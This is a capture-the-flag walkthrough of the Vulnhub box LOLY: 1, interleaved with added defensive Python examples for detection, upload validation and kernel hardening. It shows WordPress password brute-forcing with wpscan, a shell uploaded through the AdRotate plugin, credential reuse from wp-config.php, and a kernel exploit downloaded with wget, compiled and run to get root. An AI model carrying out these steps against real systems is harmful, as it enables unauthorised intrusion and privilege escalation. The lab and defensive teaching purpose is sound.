Vulnhub - LOLY: 1
Introduction
Difficulty: Easy
Tested: VMware Workstation 15.x Pro (this works better with VMware than with VirtualBox)
Goal: Get the root shell, i.e. (root@localhost:~#), and then obtain the flag under /root.
This is LOLY: 1 from Vulnhub.
Ports
We’ve got only one port open - HTTP on port 80.
WordPress
Really the only thing on the webserver is a WordPress installation, and we find it easily with gobuster. wpscan reveals only a single user (loly), and easily finds the password:
root@kali:/opt/vulnhub/loly# wpscan --url http://192.168.1.117/wordpress -U 'loly' -P /usr/share/seclists/Passwords/probable-v2-top12000.txt
// stuff removed for brevity
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - loly / fernando
Trying loly / barcelona Time: 00:00:04 <== > (345 / 12990) 2.65% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: loly, Password: fernando
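The password attack above went through XML-RPC (wpscan reports "Performing password attack on Xmlrpc"), so on the defending side the signal is a burst of POST requests to xmlrpc.php from one source. The following is an added example, not part of the original writeup or of wpscan: a small detector that parses Apache combined-format access log lines and flags any client that sends more than a handful of XML-RPC POSTs within a one-minute sliding window. The log lines, IPs and threshold are constructed for illustration.

```python
"""Flag WordPress XML-RPC password guessing in Apache access logs.

Added example; the sample log lines, addresses and threshold are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict with ip/ts/method/path/status for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def find_xmlrpc_bursts(lines, threshold=10, window=timedelta(minutes=1)):
    """Return {ip: total_xmlrpc_posts} for sources that sent at least
    `threshold` POSTs to xmlrpc.php inside any window of length `window`.

    One XML-RPC system.multicall request can carry many login attempts, so the
    per-request threshold is deliberately low.
    """
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].endswith("/xmlrpc.php"):
            per_ip[rec["ip"]].append(rec["ts"])

    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # Slide the window start forward until it covers at most `window`.
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged


# Constructed sample: 12 XML-RPC POSTs in 12 seconds from one host, plus
# ordinary traffic and a single XML-RPC POST from another host.
SAMPLE_LOG = [
    f'192.168.1.50 - - [23/Nov/2020:01:20:{s:02d} +0000] '
    f'"POST /wordpress/xmlrpc.php HTTP/1.1" 200 412 "-" "constructed-scanner/1.0"'
    for s in range(12)
] + [
    '192.168.1.60 - - [23/Nov/2020:01:20:03 +0000] "GET /wordpress/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '192.168.1.60 - - [23/Nov/2020:01:20:09 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 341 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, n in find_xmlrpc_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {n} POSTs to xmlrpc.php, likely credential guessing")
```

The window logic is a standard two-pointer sweep over each client's sorted timestamps, so it runs in linear time over the log and is easy to feed from `tail -f` in a real deployment; the response on a match would typically be a temporary block of the source and, if XML-RPC is not needed, disabling it at the web server.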
So I logged in, expecting to perhaps upload a plugin zip file, or edit a theme or something. But, no.
We have several plugins (AdRotate, Hello Dolly and Akismet) - only AdRotate is ‘unusual’. It’s version 5.8.6.2. Searchsploit reveals SQLi vulnerabilities in several older versions - all version 3.x.
We have several themes, including Feminine Style and Virtue, but these don’t seem to be vulnerable.
We can’t upload a new plugin (the button to do so is missing), and I’m … stuck.
After a while I consult a writeup to see what the move is. It turns out that the AdRotate plugin can be exploited by uploading a shell in a ZIP file format as a ‘banner image’. PHP files are blacklisted but ZIP is okay; the plugin automatically unzips the file and places it in the banners directory:
http://loly.lc/wordpress/wp-content/banners/rev-plugin.php
Navigating to this file triggers the shell.
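The weakness described above is an extension blacklist on the upload combined with an unchecked unzip into a web-served directory. As an added example (not AdRotate's code and not part of the original writeup), the following shows the defensive inverse for a banner-upload feature: every archive entry is inspected before anything is written, only allowlisted image names are accepted, symlink entries and paths that would escape the banner directory are refused, and the whole archive is rejected on the first bad entry. The archives and the destination directory are constructed for illustration.

```python
"""Validate an uploaded ZIP before extracting it into a web-served directory.

Added example; the sample archives and destination path are constructed.
"""
import io
import os
import zipfile

ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif", ".webp"}
MAX_ENTRY_BYTES = 5 * 1024 * 1024  # per-entry cap against zip bombs


class RejectedArchive(ValueError):
    """Raised on the first entry that fails validation."""


def check_entry(info, dest_dir):
    """Return the resolved output path for a ZipInfo, None for a directory
    entry, or raise RejectedArchive."""
    name = info.filename
    if name.endswith("/"):
        return None  # directory entries carry no data
    base = os.path.basename(name)
    # Strict allowlist: every dotted suffix must be an image extension, so a
    # double-extension name such as "shell.php.png" is refused as well.
    suffixes = ["." + s.lower() for s in base.split(".")[1:]]
    if not suffixes or any(s not in ALLOWED_EXT for s in suffixes):
        raise RejectedArchive(f"disallowed file type: {name}")
    # Unix mode lives in the high 16 bits of external_attr; refuse symlinks,
    # which would otherwise let an archive point outside the banner directory.
    if (info.external_attr >> 16) & 0o170000 == 0o120000:
        raise RejectedArchive(f"symlink entry: {name}")
    if info.file_size > MAX_ENTRY_BYTES:
        raise RejectedArchive(f"entry too large: {name}")
    # Resolve the final location and require it to stay under dest_dir,
    # which catches "../" traversal inside the archive.
    root = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, target]) != root:
        raise RejectedArchive(f"path escapes banner dir: {name}")
    return target


def validate_banner_zip(data, dest_dir):
    """Return the list of paths that would be written, or raise RejectedArchive
    without writing anything."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        targets = [check_entry(info, dest_dir) for info in zf.infolist()]
    return [t for t in targets if t]


def is_accepted(data, dest_dir):
    """True if the archive passes validation, False if it is rejected."""
    try:
        validate_banner_zip(data, dest_dir)
    except (RejectedArchive, zipfile.BadZipFile):
        return False
    return True


def build_zip(entries):
    """Constructed helper: build an in-memory ZIP from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in entries.items():
            zf.writestr(name, body)
    return buf.getvalue()


# Constructed samples (contents are placeholders, not real images or scripts).
DEST = "/var/www/html/wordpress/wp-content/banners"
GOOD = build_zip({"summer.png": b"constructed", "ads/winter.jpg": b"constructed"})
BAD_PHP = build_zip({"rev-plugin.php": b"constructed"})
BAD_DOUBLE_EXT = build_zip({"logo.php.png": b"constructed"})
BAD_TRAVERSAL = build_zip({"../../uploads/x.png": b"constructed"})

if __name__ == "__main__":
    for label, archive in [("GOOD", GOOD), ("BAD_PHP", BAD_PHP),
                           ("BAD_DOUBLE_EXT", BAD_DOUBLE_EXT),
                           ("BAD_TRAVERSAL", BAD_TRAVERSAL)]:
        print(f"{label}: {'accepted' if is_accepted(archive, DEST) else 'rejected'}")
```

The validation pass deliberately happens before any extraction, and the extraction itself should write only the paths returned by `validate_banner_zip`; on the web-server side, a directory that receives user uploads should additionally have script execution disabled so that a mistake here does not turn into code execution.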
I did the rest of the box by myself, but then I returned to this point. I tried googling for this exploit method, but the only references I found were in Loly writeups! And here’s what they had to say about it:
- We found a vulnerable plugin (AdRotate); we upload a shell by compressing our payload into a zip file as a new banners file
- I found a way to upload a shell & execute it
- Make sure that first, we need to upload the reverse shell as zip format
- For this, I saw that we have a plugin named “AdRotate” installed where we can upload a zip file
Huh? None of these say how they knew this plugin was vulnerable, or how to exploit it, or provide a link to a CVE, blog post or anything else. I understand my writeups aren’t always detailed; they aren’t meant to be. But I don’t quite understand how all of the ones I looked at just somehow magically knew that this method was available with AdRotate? Presumably there was an article about it somewhere; maybe my google-fu has failed me.
Loly
Anyway, I’m on as loly.
I run linpeas, find a password, and then su to loly.
[+] Searching Wordpress wp-config.php files
wp-config.php files found:
/var/www/html/wordpress/wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', 'lolyisabeautifulgirl' );
define( 'DB_HOST', 'localhost' );
www-data@ubuntu:/dev/shm$ which python3
which python3
/usr/bin/python3
www-data@ubuntu:/dev/shm$ python3 -c 'import pty;pty.spawn("/bin/bash");'
python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@ubuntu:/dev/shm$ su loly
su loly
Password: lolyisabeautifulgirl
loly@ubuntu:/dev/shm$
Root
Linpeas also says we have an older kernel, which is true.
I obtain and run the Linux Exploit Suggester script:
loly@ubuntu:/dev/shm$ wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
--2020-11-23 01:33:05-- https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.80.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.80.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 85113 (83K) [text/plain]
Saving to: ‘les.sh’
les.sh 100%[===================>] 83.12K --.-KB/s in 0.02s
2020-11-23 01:33:05 (5.12 MB/s) - ‘les.sh’ saved [85113/85113]
loly@ubuntu:/dev/shm$ chmod +x les.sh
chmod +x les.sh
loly@ubuntu:/dev/shm$ ./les.sh
./les.sh
Available information:
Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
It suggests several as highly probable. I usually don’t have much luck with kernel exploits, but let’s go:
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
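The "Comments" line above states the two preconditions Linux Exploit Suggester attaches to this entry: the bpf() syscall must be compiled in, and unprivileged use of it must not be disabled via sysctl. As an added example (not part of the writeup or of linux-exploit-suggester), the following evaluates those preconditions from a kernel config and a sysctl snapshot, so a defender can confirm whether the cheap mitigation is in place. The snapshot strings are constructed to mirror the box; on a real host they would come from `/boot/config-$(uname -r)` and `sysctl kernel.unprivileged_bpf_disabled`.

```python
"""Evaluate LES's preconditions for CVE-2017-16995 from config and sysctl text.

Added example; the config and sysctl snapshots below are constructed.
"""
import re


def parse_kconfig(text):
    """Parse /boot/config-* lines into {option: value}; 'is not set' -> 'n'."""
    opts = {}
    for line in text.splitlines():
        line = line.strip()
        m = re.match(r"^(CONFIG_\w+)=(.*)$", line)
        if m:
            opts[m.group(1)] = m.group(2).strip('"')
            continue
        m = re.match(r"^# (CONFIG_\w+) is not set$", line)
        if m:
            opts[m.group(1)] = "n"
    return opts


def parse_sysctl(text):
    """Parse `sysctl`-style 'key = value' lines into a dict."""
    out = {}
    for line in text.splitlines():
        if "=" in line:
            key, _, value = line.partition("=")
            out[key.strip()] = value.strip()
    return out


def bpf_verifier_exposure(kconfig, sysctl):
    """Apply the stated precondition
    'CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1'.

    Returns (exposed, reasons): exposed is True only when both conditions
    hold; reasons lists whichever mitigation blocks the precondition.
    """
    reasons = []
    if kconfig.get("CONFIG_BPF_SYSCALL") != "y":
        reasons.append("CONFIG_BPF_SYSCALL not enabled: bpf() syscall unavailable")
    # LES checks for the value 1; on newer kernels the value 2 also refuses
    # unprivileged bpf() (it can be switched back to 0), so treat both as set.
    if sysctl.get("kernel.unprivileged_bpf_disabled") in ("1", "2"):
        reasons.append("kernel.unprivileged_bpf_disabled is set: unprivileged bpf() refused")
    return (not reasons, reasons)


def report(kconfig_text, sysctl_text):
    """Human-readable verdict plus the hardening step if the host is exposed."""
    exposed, reasons = bpf_verifier_exposure(parse_kconfig(kconfig_text),
                                             parse_sysctl(sysctl_text))
    if exposed:
        return ("preconditions met: kernel exposed to unprivileged BPF verifier abuse; "
                "mitigate with: sysctl -w kernel.unprivileged_bpf_disabled=1")
    return "precondition not met: " + "; ".join(reasons)


# Constructed snapshots mirroring the box (Ubuntu 16.04, 4.4.0 kernel) and a
# hardened variant. CONFIG values other than CONFIG_BPF_SYSCALL are filler.
BOX_KCONFIG = """
CONFIG_BPF=y
CONFIG_BPF_SYSCALL=y
CONFIG_BPF_JIT=y
"""
NO_BPF_KCONFIG = """
CONFIG_BPF=y
# CONFIG_BPF_SYSCALL is not set
"""
BOX_SYSCTL = "kernel.unprivileged_bpf_disabled = 0\n"
HARDENED_SYSCTL = "kernel.unprivileged_bpf_disabled = 1\n"

if __name__ == "__main__":
    print("box:      ", report(BOX_KCONFIG, BOX_SYSCTL))
    print("hardened: ", report(BOX_KCONFIG, HARDENED_SYSCTL))
    print("no bpf:   ", report(NO_BPF_KCONFIG, BOX_SYSCTL))
```

The sysctl toggle is the practical mitigation for a kernel that cannot be patched immediately: it closes the unprivileged path to the verifier that this exploit relies on, without rebuilding the kernel. Patching to a fixed kernel remains the real fix.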
SEND IT:
loly@ubuntu:/dev/shm$ wget https://www.exploit-db.com/download/45010
wget https://www.exploit-db.com/download/45010
--2020-11-23 01:36:25-- https://www.exploit-db.com/download/45010
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/txt]
Saving to: ‘45010’
45010 [ <=> ] 13.41K 45.2KB/s in 0.3s
2020-11-23 01:36:28 (45.2 KB/s) - ‘45010’ saved [13728]
loly@ubuntu:/dev/shm$ mv 45010 xx.c
mv 45010 xx.c
loly@ubuntu:/dev/shm$ gcc xx.c -o xx
gcc xx.c -o xx
loly@ubuntu:/dev/shm$ ./xx
./xx
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880035047000
[*] Leaking sock struct from ffff8800355a21c0
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff8800356718c0
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff8800356718c0
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare),1000(loly)
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
____ ____ ____ ____
/ ___| _ _ _ __ / ___/ ___|| _ \
\___ \| | | | '_ \| | \___ \| |_) |
___) | |_| | | | | |___ ___) | _ <
|____/ \__,_|_| |_|\____|____/|_| \_\
Congratulations. I'm BigCityBoy